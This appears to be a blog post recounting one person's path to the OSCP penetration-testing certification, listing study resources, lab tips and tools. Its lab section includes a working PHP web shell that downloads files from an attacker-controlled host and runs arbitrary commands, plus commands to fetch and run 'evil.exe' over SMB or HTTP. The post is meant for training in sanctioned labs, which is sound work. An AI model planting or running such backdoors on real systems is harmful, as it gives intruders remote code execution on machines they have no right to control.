Zero to OSCP: Concise Edition

Daniel Houghton
Oct 1 · 11 min read

Introduction

September 1st 2018: I made the commitment to become an Offensive Security Certified Professional as fast I could, with just the foundations of a ‘B’ in A level computing gained 14 years prior and my drive to forge a career in cyber security.

August 1st 2019: I passed the OSCP exam.

If I was to collate a list of every article, cheatsheet, walkthrough, video, and forum post I utilised pre, during and post the Penetration Testing with Kali Linux course, not only would it be exponentially longer, it would be unreadable and more importantly unusable. It is paramount to realise that alongside the items below, there were countless hours of troubleshooting and triage on my path to the OSCP certification — which I knew would be the case when I committed to the process. By this logic, with some direction, it is perfectly feasible that other people with zero experience could (and probably have) become an OSCP much faster than I did.

Below is a roughly chronological and concise list of the stand out tools and resources outside of the PWK course material that helped me get from zero to OSCP in under 12 months.

PWK Preparation

‘Penetration Testing with Kali Linux is a foundational course, but still requires students to have certain knowledge prior to attending the online class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. Familiarity with Bash scripting along with basic Perl or Python is considered a plus.’ — Offensive Security

It goes without saying that you should go over the PWK course syllabus start to finish. At the very least, you’ll start to recognise the names of tools and protocols you will need to familiarise yourself with and know to pay attention when you encounter them in the resources below.

Linux Journey — It’s no understatement to say the first time I had sat behind a keyboard at a linux terminal I didn’t know my ‘ls’ from my ‘rm -rf /’. This has everything you need to get started and more. Moving around the file system and ‘grep’ing for things will get boring quickly and you’ll want to move on fast, but Linux Journey is a great resource to come back to.

  • Heavier reading? Yes. But you should at the very least skim the Kali Linux Revealed book. It’s free — no excuses.

Cybrary Cisco-CNNA — This free, 15.6 hour set of video lectures from cybrary goes into depth on the OSI model. Not only did this course improve my understanding of networking, but it bridged a lot of gaps in my existing knowledge. Some of the information might be a little superfluous to the OSCP, but it is all good knowledge. I found watching it at 1.25x speed made it a little easier to digest.

  • I also watched their course on ‘Penetration Testing and Ethical Hacking’, however while it was nice to get an overview of some of the tools mentioned in the PWK syllabus, the scope was not as deep as the cisco-ccna course.

Overthewire Bandit — The ‘bandit’ wargame, at the time, felt like my first real step into ‘hacking’. It starts off simple and scales brilliantly, giving you suggested commands and reading material to help you find what you need to access the next level. It’s not especially broad in scope, but it’s fun and it helps cement beginner Linux commands into memory. There are a ton of walkthroughs out there so refer to them for nudges and hints (Note: (this applies to all instances going forward) If you use a guide or a walkthrough, it is essential that you work backwards from the answer to the point you got stuck. Make your own notes. Don’t move past it until you understand what is happening).

  • A particular highlight was writing my first shell script on level 23. shellscript.sh helped me with this a great deal.
  • The ‘Natas’ wargame is more web focused and also a lot of fun. Unfortunately, I didn’t manage to complete it first time round before getting to a stage where I felt like I was out of my depth and leaning too heavily on guides, particularly for scripting. Writing this reminds me, I should go back and finish it.

Code Academy — I had very little prior coding experience and realised that having at least some basic scripting knowledge before jumping into the PWK course material would make my life a lot easier. I completed the python and javascript modules on codeacademy; taking advantage of the fact that the time I registered they were also offering a week free trial to their pro subscription by burning through the modules as quickly as possible.

Metasploit Unleashed — More content direct from Offensive Security; the ‘Metasploit Unleashed — Free Ethical Hacking Course’ was recommended to me by a friend that started me on the road to OSCP (shout out to Ruby Nealon: @_ruby). While Metasploit usage is restricted in the exam, it’s not restricted in the labs. Offensive Security even encourage you to experiment with it in the lab environment. It’s fun to root boxes in 30 seconds with meterpreter — try it out.

Vulnhub — Vulnhub is a fantastic way to practise hacking Linux machines. At the bottom of each machine’s page is a list of walkthroughs. Even after owning machines, I would read through a few write ups from different users to analyze and compare their methodologies and picked up a few tools along the way. Vulnhub was the first time I properly observed the ‘boot to root’ hacking process from start to finish.

Shellter Labs — The ‘Getting Started’ section on Shellter eases you in gently, but ramps the difficulty up fast. The stand out module for me was ‘The Art of Reverse Engineering’ as it introduces assembly language and the dreaded ‘buffer overflow’. Love them or hate them, they’re part of the course and you need to be able to do them. Offensive Security do a great job of explaining the process to the standard they require, but if you want to get ahead of the game, these two resources helped me wrap my head around what’s happening in a buffer overflow attack:

PWK Course

I’ve included a few bonus ‘quality of life’ tools and resources in this section that, whilst not necessarily essential, they improved my workflow by reducing the number of headaches I suffered.

Google — Undoubtedly the most used resource throughout the duration of the course (“countless hours or troubleshooting and triage”). In 2019, if you have a question, Google/YouTube will have the answer (don’t forget to make sure you understand the answer before moving on), or, at the very least, someone can point you on the path to figuring it out. Learn to use your search engine of choice well — it’s all practise for OSINT gathering.

Offensive Security Student Forums — If you go to the OS student forums looking for help on a machine you will likely find a minefield of cryptic hints, some leading to the solution but most leading you to confusion and rabbit holes. They can be great if you’ve done your enumeration properly and have an idea of the correct vector — therefore do your best to resist the urge to jump onto the forum for help until you have exhausted all the options on your list after several rounds of enumeration. A question I found myself asking early on was ‘Where do I get started in the labs?’; when faced with that question now, I give the following answer:

  • Find g0tmilk’s guide to a lab machine on the student forums.
  • Read it.
  • Read it again.
  • Read between the lines. (hint:methodology)
  • Read it and hack along.
  • Go over your notes, try the next machine along and then move onto whatever other low hanging fruit you can find.

OSCP Subreddit — Another great community for those approaching or working through their OSCP and veterans alike. Combine this with the official OS student forums to learn what makes a good question and what makes a bad question. Ask good questions, get good answers.

Reconnoitre — Reconnoitre takes one step towards automating your enumeration, but still keeps you ‘involved’ by suggesting commands for you to run against the scanned target instead of doing everything for you. This gives you the opportunity to get a better understanding of (and tweak) the syntax of each command.

highon.coffee Reverse Shell Cheatsheet — Is this all the reverse shells you’re going to need for the labs? No. Is it most of them? Probably.

Nishang — The Nishang repository of powershell scripts is another great resource for shells; I got extensive use out of Invoke-PowerShellTcp.

Netsec TTY Shell guide — Who hasn’t accidentally ‘ctrl+c’d out of a shell before? If you can spawn a tty shell and enter the commands ‘ctrl+z’, ‘stty raw -echo’, ‘fg’ and then press enter twice. Not only will you no longer be accidentally terminating shells, but you’ll also gain tab autocomplete and arrow keys.

ropnop File Transfer guide — ropnop has a great guide on transferring files to Windows targets. Working with Windows targets got a whole lot easier once I learned you could host binaries in Kali over smb and execute them directly from the target machine. Try the following out in the labs (chain it with a php cmd shell for fun and profit):

  • Kali: smbserver.py a .
  • Windows: \\your.kali.ip.here\a\evil.exe

Sente php backdoor — Sente on github has a simple php backdoor one liner that I used extensively throughout the labs.

  • I can’t remember which of his vast array of videos I found it in, but Ippsec (more on this guy a little later) showcased a great php command shell that lets you upload and execute files hosted over http on your Kali box with style and ease:

<?php

if (isset($_REQUEST[‘fupload’])) {

file_put_contents($_REQUEST[‘fupload’], file_get_contents(“http://your.kali.ip.here/" . $_REQUEST[‘fupload’]));

};

if (isset($_REQUEST[‘fexec’])) {

echo “<pre>” . shell_exec($_REQUEST[‘fexec’]) . “</pre>”;

};

?>

  • This can then be called with syntax similar to the following:

http://your.kali.ip.here/shell.php?fupload=evil.exe&fexec=evil.exe

  • Dissecting and understanding what this small php script is doing would be a good first step into the sort of thing you can expect to come across regularly in the PWK labs.

g0tmilk’s guide to Linux privilege escalation — The go-to for manual privilege escalation in Linux. It takes time to understand what each command is doing and what is considered a ‘normal’ output, but it is undoubtedly time well spent.

  • It is worth noting that automated privilege escalation scripts can save a lot of time, but they don’t always find everything.
  • LinEnum.sh checks for common misconfigurations in Linux and produces a lot of output, but if you learn to parse it quickly it can be a great first step for privesc. Throw it at the box and see if anything jumps out (protip: host it on your Kali box with your web server of choice, then on your target use curl to access the script and pipe it to bash for a smaller footprint on your target).
  • linuxprivchecker.py does a similar job, but requires python on the target machine. It also suggests potential privilege escalation exploits for you to try based on the target configuration and present applications — prone to producing false positives, but I have had some success with its suggestions.

Fuzzysecurity’s guide to Windows privilege escalation — The go-to for manual privilege escalation in Windows. Same again — spend a bit of time trying out the commands on various flavours of Windows and comparing what you get back.

  • windows-exploit-suggester.py is a great tool that takes a text file dump of the ‘systeminfo’ command output and returns public exploits and metasploit modules that could lead to elevation of privileges. Produces a lot of false positives, but I’ve gotten lucky a few times by working through its suggestions.
  • wes.py is the ‘next generation’ of Windows exploit suggester that works much like its unofficial predecessor, but has better support for post Windows Vista era machines. You can also pass flags to specifically filter out privilege escalation vulnerabilities with known public exploits.
  • jaws-enum.ps1, or Just Another Windows (Enum) Script is another powershell script that allows users to quickly identify privilege escalation vectors. Again, quite verbose in output but learn to parse it quickly and see what jumps out.
  • PowerUp.ps1 is a powershell script that checks for ‘common Windows privilege escalation vectors that rely on misconfigurations’. It’s not a catch-all by any means, but I’ve had success using it.

SecWiki Windows Kernel Exploits — SecWiki host a load of precompiled Windows exploit binaries (Always take care when running binaries you haven’t compiled yourself!).

OSCP Exam

I am purposefully avoiding being overly verbose in my discussion of the OSCP exam for obvious reasons. If you’ve worked through the course materials and labs, checked out the resources in this article and have strong Google-Fu, you should be sufficiently equipped to pass.

Offensive Security OSCP Exam Guide — Read this and read it again. Pay specific attention to the submission instructions, proof.txt screenshot formats and don’t forget to submit your proof.txt keys into the exam panel. I’ve read horror stories of people acing the exam machines with but failed because of a mistake in the report submission process.

Hack the Box — I scheduled my exam for after my lab time had ended and in the interim I spent my time in the Hack the Box labs working through their ‘OSCP-like’ boxes (@TJ_Null curated a list of such machines here). Pay for the VIP access and you’ll get access to a lower population lab environment and their retired machines, for which walkthroughs are permitted; as with the Vulnhub VMs you can then refer to the guides when you hit a wall. They also have a number of Windows boxes and I found myself learning a lot on these.

Ippsec’s Hack the Box Walkthroughs — Ippsec makes video walkthroughs of the retired Hack the Box machines. He’s a fantastic teacher and does an excellent job of explaining his approach. Something I particularly appreciate is that he leaves the film rolling when things don’t go to plan so you get to watch his troubleshooting process. Even if it’s not a machine that you are currently tackling or even have any intention of working on, watch his videos while you eat your breakfast/take a break/wind down after a day at work and you are guaranteed to learn something.

nmapAutomator — No automated enumeration script will catch everything, but with time management being a key factor to success in the OSCP exam, it’s great to have something you can run in the background while you work on something else. This is exactly what nmapAutomator.sh from 21y4d is brilliant for. You can then parse the output and extend your enumeration as necessary. Try not to lean on this as a crutch and only use it when you feel comfortable with enumerating manually.

Summary

As stated in the introduction, the aforementioned resources were curated to be as ‘time spent:knowledge gained’ efficient as possible — with hindsight, I would attribute my success in the PWK course and OSCP exam to this foundation, paired with the TryHarder® mentality and my passion for cyber security. If you have a similar drive and build on this foundation, you’ll get your OSCP.

This writeup will be partnered with an ‘Extended Edition’ which covers my thoughts and experiences in a little more depth. Coming Soon…

Verify my OSCP status with Acclaim

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade